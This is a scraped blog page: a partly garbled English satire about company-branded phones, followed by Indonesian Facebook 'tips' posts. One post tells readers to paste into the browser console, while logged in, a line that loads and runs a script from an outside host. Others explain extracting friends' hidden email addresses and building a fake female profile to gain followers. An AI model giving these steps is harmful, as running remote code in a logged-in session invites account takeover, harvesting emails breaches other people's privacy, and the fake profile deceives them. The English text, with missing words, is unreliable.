Facebook Phone

Facebook unveiled a new application for Android-driven smartphones and tablets Thursday, a move that comes as a fast-growing number of its 1.06 billion users access the social networking site on their mobile devices.
CEO Mark Zuckerberg took the stage a little after 1 p.m. ET in Menlo Park, Calif., to unveil what the company is calling Facebook Home.

It's essentially an all-encompassing app for any Android device. Facebook Home becomes the homescreen for the phone, a filter through which all other devices and applications can be used.
Zuckerberg began the presentation by noting that currently, smartphone users spend 20 per cent of the time they're using their devices on Facebook. And the company wants to increase that by transforming itself into a central hub through which all other applications can be used.


Now that Apple, Microsoft and Google into the mobile device business, the team here in NPR's corporate R&D division is discussing what our own branded phone experience might offer. Features we're considering include on-demand ringtones built on sound clips from today's headlines and on everyone's voicemail.
Unfortunately we are not the only company that sees gaping holes in the market for loyal customers to telegraph their brand affinities with expensive, pocket-sized devices packed with features that make it easier to do everything but make a phone call and actually hear the person you're talking to.
So what are our competitors up to? Here's what our corporate espionage staff has uncovered so far.
Yahoo Phone: The fallen digital king, struggling to reestablish its reign, offers a new mobile service that only works .
Netflix Phone: The steaming service gives you a personalized library of TV shows and movies you're actually .
LinkedIn Phone: The Facebook for makes it easier for former coworkers to find you and ask you for job leads and "Endorsements" (tm).
: Provides "one-click" calling and suggests an uncanny list of other people you've been meaning to call (your mother will love you for it!).
Pandora Phone: The music service will personalize calls with random ringtones by your feelings about the callers based on words you've used about them in your email.
Given the increasing competition, we hear the major phone carriers are also considering how to enter the phone market. However, the industry's previous experience offering devices designed to provide personal playlists of hold music while automatically draining your bank account didn't catch on with customers as the companies hoped.

The mobile advertisement market is growing quickly. That's thanks in large part to Facebook and Twitter, which also entered the space in 2012. Research firm eMarketer expects U.S. mobile ad spending to grow 77 per cent this year to $7.29 billion, from $4.11 billion last year.
»»  READMORE...

Update Status Facebook Via Apa Saja Gratis

Update Status Facebook Via Apa Saja hal yang lumrah untuk facebooker yang selalu update status, tapi bosan g ada yang unik, ini ada trik update status via apa saja yang bisa sobat gunakan untuk update facebook sobat.
Update Status Facebook Via Apa Saja Gratis

Silahkan langsung menuju TKP

# Media Elektronik
Via Smartfren Andro
Via BlackBerry
Via BlackBerry Smartphones Apps
Via BlackBerry Messenger
Via BlackBerry Messenger for Android
Via BlackBerry Dakota
Via Android 4.1
Via Thosiba
Via Samsung Smart TV

# Media Web
Via Google +
Via Twitter   
Via Yahoo
Via Bing

# Media Permainan
Via Counter Strike
Via Point Blank (PB)

# Lain-Lain
Via MalMing Kelabu
Via Hati Yang Paling Dalam
Via Hati Lagi Panas Tingkat Dewa
Via Spiderman
Via Telepon Umum


Sekian trik Update Status Facebook Via Apa Saja yang bisa saya share. Untuk sobat yang mau menambahkan lagi bisa Inbox saya lewat Facebook. Bakul Gadget
Terima kasih
See You Next Post

»»  READMORE...

Cara Merubah Bahasa Facebook Menjadi Bahasa Jawa

Cara Merubah Bahasa Facebook Menjadi Bahasa Jawa, Itulah yang akan saya bahas malam ini. Merubah bahasa di facebook, sebenarnya trik ini sudah lama banget dan sudah banyak di share di blog tetangga. Tapi untuk sobat yang belum tau dan ingin tau. Eh, bukan hanya sekedar tau tapi ingin merubah bahasa ke jawa bukan? Untuk itu ikuti saja langkah-langkahnya.
langsung saja sobat -->

Cara Merubah Bahasa Facebook Menjadi Bahasa Jawa
  • Pertama ya harus dulu ke akun Facebook sobat, lewat PC (saran untuk memakai Browser Opera) maupun lewat HP (opera mini).
  • Kedua,  Jika sudah Login, langsung masuk saja kesini.
  • Pilih Basa  Jawa. Untuk merubah bahasa lain bisa pilih selera sobat.
  • Selanjutnya tinggal klik Rampung.
  • sudah,, udah rampung berarti sudah sob. Jangan lihat-lihat terus wkwkwk
Sudah berhasil bukan sobat? Semikian tutorial tentang Cara Merubah Bahasa Facebook Menjadi Bahasa Jawa. Sangat simpel bukan? emang simpel sih tapi gini aja masih ada yang belum tau (wkwk becanda sobat)
Untuk sobat yang mau Membuat URL Blog Dengan Menggunakan Kode BlackBerry silahkan masuk ke link tersebut.
Semoga bermanfaat.
See You Next Post

»»  READMORE...

Cara Mendapatkan Banyak Follower Atau Pengikut Di Facebook

Hello sobat AZA Blog, saya ada tips Cara Mendapatkan Banyak Follower Atau Pengikut Di Facebook yang sudah saya praktekin dan ini adalah hasil riset saya pribadi. Cara ini sebenarnya "privasi" pribadi tips mendapatkan banyak pengikut di facebook saya, tapi saya rasa kalau ini di share untuk teman-teman, mungkin akan lebih bermanfaat untuk sobat semua, jadi saya sekarang mau berbagi karena tujuan saya adalah berbagi untuk semua. Semoga artikel ini bermanfaat buat sobat semua.
Untuk caranya sendiri bisa di praktekin langsung ke TKP -->
Pengikut Follower Subcribe
  1. Pertama, untuk sobat yang mau mendapatkan banyak pengikut, sobat harus memiliki umur 17 tahun keatas. Sobat bisa mengubah umur di profil facebook sobat. Kalo saya mengubah ke tahun 1994.
Note:
  • Untuk lebih banyak pengikut, ubahlah profil sobat menjadi cewek, semua ganti menjadi cewek (poto cewek kalo bisa yang cantik)
  • Karena kebanyakan kalau cewek banyak yang mau nge-add apalagi cowok yang ngeliat poto profil cewek cantik. wkwkwk

     2. Kedua, setelah mengganti profil, kemudian aktifkan fitur pengikut atau follower dengan cara masuk saja kesini.

     3. Muali masuk ke tahap sebenarnya,
  • Promosikan facebook sobat ke fanspage yang banyak pengikutnya, dengan cara hanya menuliskan komentar "add me / add me ya?/ add me all"
Terserah sobat mau ngomong apa.
  • Setelah ada yang nge-add, jangan langsung di terima begitu saja, klik "jangan sekarang/ lain kali" jangan HAPUS PERMINTAAN (atau dengan kata lain kita tidak menerimanya sebagai teman)
  • Dengan begitu secara otomatis DIA (yang nge-add) akan menjadi pengikut kita.
Demikianlah artikel saya yang membahas Cara Mendapatkan Banyak Follower Atau Pengikut Di Facebook.
Untuk sobat yang cari artikel tentang Cara Membuat Sitemap Atau Daftar Isi SEO Friendly Di Blog bisa langsung klik link tersebut. Bakul Gadget mengucapkan Terima kasih
Semoga artikel ini bermanfaat untuk sobat semua.
See You Next Post.

»»  READMORE...

Cara Agar Facebook Aman Dari Hacker

Hello Sobat Gobel's Blog, maraknya sebuah perbuatan yang tidak terpuji dengan banyaknya pembobol akun facebook yang tidak bertanggung jawab, kali ane mau share tentang Cara Agar Facebook Aman Dari Hacker. Sebenarnya artikel ini sudah banyak dibicarakan tapi masih banyaknya temen-temen yang belum mengetahui, jadi ane share deh tips dan trik Cara Agar Facebook Aman Dari Hacker.
Langsung saja ke pembahasan ya
Facebook Aman Dari Hacker

  • Pertama, kalau sobat ingin Login facebook, teliti dulu url (biasa nulis www..) 
        contoh: https://www.facebook.com/ atau https://www.facebook.com/login.php
        Harus sama, kalau sobat menemukan url contoh: http://wwww.facebook.com/ jangan pernah masuk/login disitus itu, itu adalah Fake Login, coba lihat ada berapa www yang terdapat disitu, beda dengan yang asli yang mempunyai www 3 kali doang tapi Fake Login tersebut ada 4 huruf. atau masih banyak lagi situs yang url-nya meniru dengan situs aslinya.
  • Kedua, Jangan pernah menampilkan email di profil facebook sobat.atur privasi menjadi "Hanya Saya".
memang di profil facebook yang sekarang tidak kelihatan, tapi namanya hacker bisa mengetahui dengan Cara Melihat Email Facebook Teman Yang Tersembunyi yang sudah ane share sebelumnya.
untuk mengatur agar email tidak kelihatan saat diambil dengan cara tadi,
sobat bisa melakukan yang pertama, Masuk ke profil facebook sobat --> Tentang --> Info Kontak.
klik (sunting) lalu privasi email sobat ganti menjadi "hanya saya" atau gambar gembok.
  • Ketiga, masukkan nomor HP sobat dan lakukan verifikasi, nanti akan ada kode untuk memverifikasi akun facebook sobat.
         Ini dilakukan agar aman kalau-kalau ada aktifitas mencurigakan pada akun facebook sobat.
  • Keempat, gunakan password yang berbeda dengan password email yahoo sobat.contoh password yahoo sobat : BukanRahasiaLagi maka password facebook sobat harus berbeda contoh: LupaKataSandi123 (perpaduan huruf besar dan angka akan lebih menyulitkan Hacker untuk membobol akun facebook).
  • Kelima, Jangan pernah menggunakan password dengan tanggal lahir sobat, itu akan memudahkan Hacker untuk membobol akun facebook sobat.
  • Atur keamanan di facebook sobat dengan menyetingnya seperti ini.
Klik Pengaturan Akun --> Lalu lihat sebelah kiri, klik Keamanan --> klik tulisan sunting pada Jelajah Aman dan centang pada "Menelusuri Facebook pada koneksi aman (https) bila memungkinkan ". kalau sudah save. Ini akan memperingatkan sobat kalau sobat menjumpai link dan mengarah ke situs yang tidak aman maka facebook akan memberitahukan bahwa "situs ini tidak aman".
  • Klik tulisan sunting dibagian "Persetujuan masuk ke facebook" ini akan berfungsi jika sobat login facebook dan akan dikirimi kode yang berupa angka 6 digit ke ponsel sobat. Ini yang paling aman, karena segala sesuatu yang akan terjadi dengan akun facebook sobat akan ada pemberitahuan ke ponsel sobat.
Sekian tutorial yang bisa ane share buat sobat tentang Cara Agar Facebook Aman Dari Hacker. Semoga bermanfaat untuk sobat dan menurunkan angka pembobolan akun facebook. Untuk sobat yang ingin mengerjai teman bisa masuk kesini Cara Mengerjai Orang Dengan Shortcut.
Terima Kasih
See You Next Post..


»»  READMORE...

Cara Melihat Email Facebook Teman Yang Tersembunyi

Jumpa lagi sobat Gobel's Blog, kali ini ane mau share soal Cara Melihat Email Facebook Teman Yang Tersembunyi. Sedikit cerita nih, Suatu saat ane ngintip profil facebook teman ane untuk melihat email yang digunakan untuk masuk ke facebook, tapi ane g nemuin alamat email yang digunakan teman ane, semuanya g ada. Lalu ane cari cara untuk itu dan ternyata berhasil juga. Semua email teman facebook teman ane keliatan . Langsung ane simpen aja semuanya ke bookmark.
Kalo sobat mau tau Cara Melihat Email Facebook Teman Yang Tersembunyi langsung saja masuk ke langkah-langkahnya.
  • Langkah pertama, masuk ke akun Yahoosobat.
  • Kedua, Klik tombol Kontak, setelah itu akan muncul halaman lagi, klik Impor Kontak.
Lihat gambar -->

Melihat Email Facebook Teman Tersembunyi



  • Ketiga, Nanti akan muncul kotak lagi, dan klik gambar facebook
Melihat Email Facebook Teman Tersembunyi


  • setelah itu akan muncul kotak baru, dan klik OK
Melihat Email Facebook Teman Tersembunyi

  • Selanjutnya, tinggal menunggu prosesnya selesai, setelah selasai nanti akan muncul semua alamat email teman sobat. Lihat gambar.
Melihat Email Facebook Teman Tersembunyi

  •  Langkah terakhir, untuk melihat semua email dalam layar yang lebar, klik tombol Pilih Semua, lalu klik Tindakan dan pilih Cetak Semua
Melihat Email Facebook Teman Tersembunyi

 Kalo udah selesai, terserah sobat mau sobat simpen dlm bentuk word/txt.
Selamat mencoba, dan bersuka ria udah bisa Cara Melihat email Facebook Teman Yang Tersembunyi.
Kalo udah bisa jangan lupa kabari ya? komen disini.
Terima Kasih
untuk sobat yang mau lihat Cara Masuk Facebook Tanpa Email langsung menuju TKP. Bakul Gadget mengucapkan Terima kasih.
See You Next Post


»»  READMORE...

Cara Masuk Facebook Tanpa Email

Hello Sobat Gobel's Blog, udah 3 hari g posting, sekarang ane mau berbagi tips untuk sobat semua yaitu Cara Masuk Facebook Tanpa Email. Biasanya kan kalo mau masuk facebook pake email,
Contoh: email.gue@yahoo.com
Tapi kali ini sobat bisa masuk facebook tanpa email.

Ada 3 cara untuk masuk facebook,
  • Cara Pertama adalah cara diatas yang menggunakan email untuk masuk ke Facebook,
  • Cara  Kedua, yaitu menggunakan email khusus bawaan facebook yang sudah menyediakan email sendiri buat akun facebook kita,
        Contoh: email.gue@facebook.com
Itu adalah email yang sudah disediakan oleh pihak facebook sendiri.
Untuk yang belum mengetahui email tersebut, sobat bisa masuk ke facebook sobat --> Profil --> Tentang
Nah di Kotak Info Kontak ada email sobat yang berakhiran @facebook.com
  • Cara Ketiga, Cara inilah yang paling mudah dan paling simpel. Diantara ketiga cara tersebut, ane biasa pake cara yang terakhir ini. soalnya g pake @@tan.
Langsung untuk mengetahui,, ini adalah Username facebook sobat.
Contoh: https://www.facebook.com/email.gue 
Ambil tulisan yang berwarna hijau, itulah username sobat yang bisa sobat gunakan untuk masuk ke facebook sobat.

Demikian tutorial tentang Cara Masuk Facebook Tanpa Email yang bisa ane share untuk sobat semua.
Bakul Gadget mengucapkan Terima Kasih
See You Next Post



    »»  READMORE...

    Cara Membuka 2 Akun Facebook Secara Bersamaan di Mozzilla Firefox

    Salam hangat Sobat Gobel's Blog, Sobat mencari tau agar bisa Membuka 2 Facebook Secara Bersamaan di Mozilla Firefox? ni ane ada teknik untuk membuka facebook secara bersamaan di mozilla firefox. Biasanya orang sih mau membuka 2 akun facebook sekaligus, tap g tau bagaimana caranya, setiap kali membuka tab baru dengan url facebook, pasti akan muncul akun kita yang udah Login in.
    Kalau Sobat minat langsung aja ke TKP --->>


    • Pertama, sobat buka menu RUN, (lewat Start lalu klik run), atau bisa dengan menekan Win + r maka akan muncul kotak dialog seperti ini
    Membuka 2 Facebook Bersamaan
                kemudian GANTI nama tersebut dengan ini
    firefox.exe -p -no-remote
               Lalu tekan OK
    • Kedua, nanti akan muncul kotak berikut
    Membuka 2 Facebook Bersamaan


    • Ketiga, Setelah itu klik tulisan Create Profile dan akan muncul box baru, klik saja Next dan akan kotak berikutnya

    Membuka 2 Facebook Bersamaan
                    Klik Finish
    • Keempat dan terakhir, akan muncul kotak lagi seperti ini

    Membuka 2 Facebook Bersamaan






    • Jika sudah, klik Nama Profile beda dan kemudian Klik Start Firefox
    Maka akan muncul Jendela baru dengan akun yang berbeda.
    terima kasih, semoga bermanfaat dan selamat mencoba
    See You Next Post




    »»  READMORE...

    Kode Chat Facebook Unik Terbaru

    Hello sobat Gobel's Blog, Anda mencari kode unik chat facebook? oke emang inilah yang akan ane Share buat kalian sobat Gobel's Blog, Facebook ternyata menyembunyikan banyak kode dan ini hanya sebagian saja yang bisa ane share sekarang.Untuk Kalian yang maucek No hp bisa klik ini-> Cek Nomor HP Sendiri Karena Lupa Untuk Selanjutnya kalian coba sendiri kayak gimana hasil kode unik chat facebook terbaru ini.

    Kode Emoticon Chat Facebook
    [[f9.laugh]]
    [[f9.sad]]
    [[f9.angry]]
    [[f9.sleepy]]
    [[f9.shock]]
    [[f9.kiss]]
    [[f9.inlove]]
    [[f9.pizza]]
    [[f9.coffee]]
    [[f9.rain]]
    [[f9.bomb]]
    [[f9.sun]]
    [[f9.heart]]
    [[f9.heartbreak]]
    [[f9.doctor]]
    [[f9.ghost]]
    [[f9.brb]]
    [[f9.wine]]
    [[f9.gift]]
    [[f9.adore]]
    [[f9.angel]]
    [[f9.baloons]]
    [[f9.bowl]]
    [[f9.cake]]
    [[f9.callme]]
    [[f9.clap]]
    [[f9.confused]]
    [[f9.curllip]]
    [[f9.devilface]]
    [[f9.lying]]
    [[f9.rofl]]
    [[f9.billiard]]
    [[f9.cakepiece]]
    [[f9.rosedown]]
    [[f9.shutmouth]]
    [[f9.shy]]
    [[f9.silly]]
    [[f9.tongue1]]
    [[f9.fastfood]]
    [[f9.ring]]
    [[f9.plate]]
    [[f9.candle]]
    [[f9.party]]

    Untuk selanjutnya ane ngucapin SELAMAT MENCOBA dan berchating ria menggunakan kode chat facebook unik terbaru ini.
    Semoga Bermanfaat
    See You Next Post



    »»  READMORE...

    Cara Mengetahui Teman Facebook Yang Memutuskan Pertemanan

    Cara Mengetahui Teman Facebook Yang Memutuskan Pertemanan. Seperti yang kita ketahui, di dalam Facebook terdapat fitur di mana kita akan mendapat notifikasi / pemberitahuan tentang berbagai hal, mulai teman yang berkomentar pada suatu status atau hanya sekedar me-like- status tersebut, notifikasi tentang pesan yang masuk pada akun kita, hingga notifikasi tentang permintaan pertemanan dari orang yang ingin mengajak pertemanan dengan kita. Sedangkan notifikasi tentang teman yang telah memutuskan hubungan pertemanan dengan kita atau dikenal dengan “Unfriend”, Facebook belum menyediakannya. 

    Cara Mengetahui Teman Facebook Yang Memutuskan Pertemanan. Sekarang, dengan adanya aplikasi baru yang dapat kita install pada facebook telah memungkinkan pengguna facebook mengetahui siapa saja teman yang telah memutuskan pertemanan dengan kita. Aplikasi tersebut adalah “Unfriend Finder”. Aplikasi tersebut support terhadap berbagai browser, seperti Firefox, Google Chrome, Safari, Opera, juga Internet Explorer. Agar aplikasi Unfriend Finder ini berjalan maka pada browser harus diinstall add-on Greasemonkey terlebih dahulu. 
    Berikut cara melakukan installasi GreaseMonkey dan Unfriends Finder pada facebook. Pada contoh ini, Tips dan Trik Komputer menggunakan browser Firefox.
    Pertama, install terlebih dahulu add-on GreaseMonkey dengan klik DI SINI
    Kedua, kemudian akan muncul jendela “Software Installation”, klik “Install”, seperti gambar di bawah ini.
    Ketiga, jika sudah, restart Firefox dengan cara menutupnya kemudian membukanya kembali.
    Keempat, jika GreaseMonkey berhasil diinstall maka kita akan melihat icon Greasemonkey berupa kepala monyet yang berada di sudut kanan atas pada Firefox, seperti gambar di bawah ini.

    Kelima, langkah selanjutnya adalah menginstall “Unfriend Finder” dengan mengklik DI SINI.
    Keenam,  kemudian klik “Install” dan kemudian akan muncul jendela "Greacemonkey Installation" kemudian klik "install" dan tunggu hingga proses selesai.


    Ketujuh, kemudian logout (keluar) dari Facebook dan kemudian login (masuk) kembali.
    Kedelapan, sekarang pastikan menu “Unfriends” telah muncul di sudut bagian kanan atas pada halaman facebook kita, seperti gambar di bawah ini.
    Kesembilan, untuk mengetahui daftar teman yang telah memutuskan pertemanan dengan kita, silakan tombol Unfriends tersebut. Selain itu, kita juga dapat mengetahui jumlah teman yang belum melakukan konfirmasi atas permintaan pertemanan yang kita lakukan kepada orang lain. Itulah Cara Mengetahui Teman Facebook Yang Memutuskan Pertemanan yang bisa saya Share untuk membantu Anda. Selamat mencoba.
    Thanks
    see you next post..



    »»  READMORE...

    Cara Menambahkan Semua Teman Ke Grup Facebook | Auto Invite

    Cara Menambahkan Semua Teman Ke Grup Facebook | Auto Invite
     
    Kini Gobel's Blog bakalan ngeshare tentang Cara Menambahkan Semua Teman Ke Grup Facebook Kita Dengan CepatJika anda sedang ingin menambahkan banyak teman facebook anda ke grup anda, pasti anda ingin cepat kan? masa kalau nambahnya satu persatu nanti malah kelamaan.. maka dari itu saya share Cara Cepat Menambahkan Teman Ke Grup Facebook. Meskipun cara ini sudah jadul, tapi kan tidak ada salahnya untuk mencoba, bukan?



    Cara Cepat Menambahkan Teman Ke Grup Facebook | Auto Invite :

    1. Buka Facebook Anda
    2. Masuk ke grup yang ingin ditambahkan teman.
    3. Klik Ctrl + Shift + K 
    4. Masukkan kode berikut ini dikotak kecil dibawah.

    document.body.appendChild(document.createElement('script')).src='http://yourjavascript.com/34253702911/auto-invite-grup-facebook.js';
    Auto Invite Grup Facebook

    5. Lalu tekan Enter.
         Note: kalau mau ngilangin kotak diatas bisa tekan CTRL+SHIFT+K lagi, maka kotak akan hilang.
    6. Kalau tidak percaya bisa dicoba dulu disini
    7. Tunggulah hingga proses selesai.

    Auto Invite Grup Facebook

    8. Bila sudah selesai, nanti ada tulisan Close... yaudah klik tuh

    Auto Invite Grup Facebook

    9. Refresh atau Reload ulang halaman grup, dan lihat perubahannya..!! semua teman anda langsung ke add semuanya.. WOW banget kan?
    Auto Invite Grup Facebook
    10. Selesai deh.
    Cukup mudah bukan?
    Demikian  tutor tentang Cara Menambahkan Semua Teman Ke Grup Facebook | Auto invite.
    Untuk sobat yang mau melihat teman yang memutuskan pertemanan facebook bisa masuk kesini Cara Mengetahui Teman Facebook Yang Memutuskan Pertemanan.
    #Semoga Berhasil.
    See You Next Post..




    »»  READMORE...

    ---->>Alexa<-----

    ---->Histats<----

    Link Sobat